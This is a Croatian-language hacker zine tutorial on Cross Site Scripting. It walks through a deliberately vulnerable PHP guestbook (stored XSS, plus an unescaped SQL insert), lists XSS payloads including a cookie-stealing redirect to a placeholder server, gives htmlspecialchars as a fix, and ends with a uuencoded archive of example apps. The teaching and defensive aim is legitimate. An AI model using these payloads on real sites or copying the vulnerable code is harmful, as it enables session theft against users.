...................
                     ...::: phearless zine #1 :::...
                  
...............>---[ Cross Site Scripting with examples ]---<...............

..........................>---[ by Exoduks ]---<............................
                                                    exoduks[at]gmail[dot]com

SADRZAJ:

    [0]  Uvod
    [1]  XSS - Sto je to 
    [2]  Za sto nam je XSS koristan 
    [3]  Dvije najcesce metode XSS napada 
    [4]  Primjeri i exploitovanje
    [5]  Primjeri korisnog JavaScript koda
    [6]  Zastita
    [7]  EOF a.k.a THE END


    ***  na kraju teksta se nalazi uuencodeovan XSS-examples.tar.gz sa primerima 
    ***  za exploitanje vezanim za ovaj tekst !


////////////////////////////////////////////////////////////////////////////
--==<[ 0. Uvod
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

    U ovom tekstu cu vam pisati o Cross Site Scripting propustu u web 
aplikacijama. Inace XSS propust je dosta rasiren i programeri premalo pozornosti 
posvecuju sigurnosti web aplikacija.   
    Cross Site Scripting ili skraceno CSS koji mnoge asocira na Cascading 
Style Sheet i ako jedno s drugim nemaju nikakve veze. Jos je i poznat pod 
nazivom koji se najcesce upotrebljava, a to je XSS koji cu i ja u daljnjem 
dijelu koristiti. 



////////////////////////////////////////////////////////////////////////////
--==<[ 1. XSS - Sto je to 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

    XSS je propust koji se javlja kad neka web aplikacija dobije zlonamjerne 
podatke od korisnika, u najcescem slucaju taj zahjtev sadrzi JavaScript, 
HTML, VBScript ili neki drugi kod. Jednom kad web aplikacija zaprimi takav 
kod prosljeduje ga korisnku gdje njegov web browser izvrsi zlonamjerni kod. 



////////////////////////////////////////////////////////////////////////////
--==<[ 2. Za sto nam je XSS koristan 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

    XSS je beskoristan ako zlonamjerni kod izvrsi vas browser na vasem 
racunalu, jer dobijete vlastite podatke, a to mozete dobiti i bez toga, 
stoga se XSS primjenjuje na neku osobu od koje zelite dobiti odredjene 
podatke, natjerate da web aplikacija zlonamjerni kod prosljedi njegovom 
browseru koji to izvrsava na njegovom racunalu. XSS se najcesce koristi za 
dobijanje cookie-a i session-a. 



////////////////////////////////////////////////////////////////////////////
--==<[ 3. Dvije najjace metode XSS napada
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

    Prva metoda je kada korisnik posalje web aplikaciji zlonamjerni kod i 
ona ga spremi negdje na serveru (u neku bazu, neki fajl ili nesto trece) i 
svaki put kada neki korisnik ucita odredjenu stranicu web aplikacija sa 
servera ucitava zlonamjerni kod i salje ga korisniku koji je posjetio tu 
stranicu.
    Druga metoda je da se "zlonamjerni kod" ne pohranjuje na serveru nego ga
korisnik unosi nekim putem u web aplikaciju i ona mu ga proslijeduje natrag, 
te se kod zatim izvrsava. 
    Prva metoda je korisnija od ove druge jer je laksa za exploitati. U 2-oj 
metodi moramo natjerati na neki nacin zrtvu da ona sama unese zlonamjerni 
kod koji ce se izvrsiti na zrtvinom racunalu i poslate podatke nama.



////////////////////////////////////////////////////////////////////////////
--==<[ 4. Primjeri i exploitanje
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

    Kao sto sam vec napomenuo uz ova tekst prilozeni se u primjeri ranjivih 
web aplikacija, koje ste trebali vec instalirati. Prvo sa vasim browserom 
posjetite:
    
    http://www.server.com/XSS-primjer/index.php 
    
...i pokrenut ce se aplikacija koja ce vam ispisati sadrzaj baze, na ovom 
principu rade forumi, razne knjige gostiju, a velik broj njih je ranjiv na 
XSS, pogotovo one manje poznate. Nas u ovom dijelu ne zanima kod index.php 
stranice pa ga necu objasnjavati. 
    Kliknite na link koji se nalazi na index.php stranici "Dodaj tekst !" 
koji vodi do strance sa formom za unos texta "add.html"(simulacija dodavanja 
posta na forumu ili knjigi gostiju). Na toj stranici za pocetak cemo unijeti 
pod naslov "Proba", a pod tekst "Blabalbal" nakon unosa pritisnite submit. 
Nakon toga trebalo bi vam se pojaviti Uspjesno dodano. Zatim opet posjetite 
"index.php" na kojoj cete vidjeti text koji ste unijeli preko forme. 

Zatim otvorite add.php i pogledajte sljedeci kod:

------- star code ------- 
  <?php
    include("config.php");

    $naslov = $_POST['naslov'];
    $text = $_POST['text'];

    mysql_connect($server, $dbuser, $dbpass);
    mysql_select_db($database) or die("Greska u spajanju na bazu !");

    $query = "INSERT INTO XSS_primjer1 VALUES ('$naslov', '$text')";
    mysql_query($query);
    mysql_close();

    echo "Dodano u bazu !";

  ?>
------- end code ------- 

Idemo sad malo razjasniti kod:
 
...
include("config.php"); 
...
  - ukljucuje se fajl config.php u kojem su smjesteni podaci za spajanje na 
bazu.


...
$naslov = $_POST['naslov']; 
$text = $_POST['text']; 
...
  - ove dvije varijable hvataju POST zahtjev od add.html forme, posto nema      
    nikakve provjere za sadrzajem tih dviju varijabli mozemo bez problema    
    unijeti zlonmajerni kod, kao sto cete vidjeti sami.


...
mysql_connect($server, $dbuser, $dbpass);
mysql_select_db($database) or die("Greska u spajanju na bazu !");

$query = "INSERT INTO XSS_primjer1 VALUES ('$naslov', '$text')";
mysql_query($query);
mysql_close();

echo "Dodano u bazu !";
 ...
  - funkcije za spajanje na bazu i dodavanje sadrzaja varijabli $naslov i 
    $text u bazu, ali taj dio i nije toliko vazan.


Znaci koliko vidimo iz gornjeg koda nema provjere ulaznih varijabli $naslov 
i $text stoga je XSS napad moguc pa idemo da vidiom i to.


 - sa browserom posjetite add.html i u polje naslov stavite "proba - xss" 
   a pod text stavite sljedeci JavaScript kod:

     <script>alert('XSS primjer 1 - exploited !');</script>

- nakon sto ste unijeli kliknite na submit i zatim ponovno otidite na 
  index.php stranicu.

- odmah nakon sto se stranica ucita iskocit ce vam prozor sa porukem "XSS  
  primjer 1 - exploited !"

- kao sto smo i predpostavili moguce je unijeti kod i sremiti ga u bazu te 
  ce se izvrsiti na svim korisncima koji posjete tu stranicu.



////////////////////////////////////////////////////////////////////////////
--==<[ 5. Primjeri korisnog JavaScript koda
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

<script>alert('Lamed !');</script>

<script>alert(document.cookie);</script>

<script>document.location='http://server/cookie.php?'+document.cookie</script>

<IMG SRC="javascript:alert('Lamed!');">

<BODY BACKGROUND="javascript:alert('Lamed !')">

<LINK REL="stylesheet" HREF="javascript:alert('Lamed !');">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('Lamed !');">

<BODY ONLOAD=alert('Lamed !')>



////////////////////////////////////////////////////////////////////////////
--==<[ 6. Zastita
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

    Najbolja zastita protiv XSS napada je da se filtriraju sve ulazne 
varijable. To se moze uciniti putem gotovih funkcija ili mozete napisati 
neke provjere da li varijabla sadrzi npr. "script", i tagove <> ! 
Evo vam nekih funkcija u php-u koje se za to koriste, najcesce u kombinaciji
s nekom drugom funkcijom drugom:

// from php menual

eregi_replace    --  Replace regular expression case insensitive
                     This function is identical to ereg_replace() 
                     except that this ignores case distinction when 
                     matching alphabetic characters. 

htmlspecialchars --  Convert special characters to HTML entities
                     This function is useful in preventing user-supplied 
                     text from containing HTML markup, such as in a message 
                     board or guest book application. 

Idemo vidjeti sto bi se dogodilo da u kod od add.php jos dodamo sljdeci kod:

Ispod:
...
$naslov = $_POST['naslov'];
$text = $_POST['text'];
...

Dodamo jos:
...
$naslov = htmlspecialchars($naslov);
$text = htmlspecialchars($text);
...

Idemo sada vidjeti sto ce se dogoditi ako opet u aplikaciju unesemo javascript 
kod. Posjetite http://www.server.com/XSS-primjer/add.html i unesite i pod Naslovi 
pod Tekst <script>alert('XSS primjer 1 - exploited !');</script>. Zatim kliknite 
na submit. Primjetit cete da nam nace iskociti prozor nego ce nam se javascript kod
koji smo unijeli ispisati ali se nece izvrsiti.



////////////////////////////////////////////////////////////////////////////
--==<[ 7. EOF a.k.a THE END
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

    Dosli ste na kraj ovog teksta koji je trebao biti malo duzi ali zbog 
pozurivanja :) morao sam to malo skratiti. Pozdravljam sve koje poznam :) 
neda mi se pisati sada listu ! Nemojte zamjeriti na gramatickim greskama.
BTW. posjetite www.hackgen.org !



begin 644 xss-examples.tar.gz
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
0AH:&QC>)_P$@-@#I`'@`````
`
end
sum -r/size 19780/2401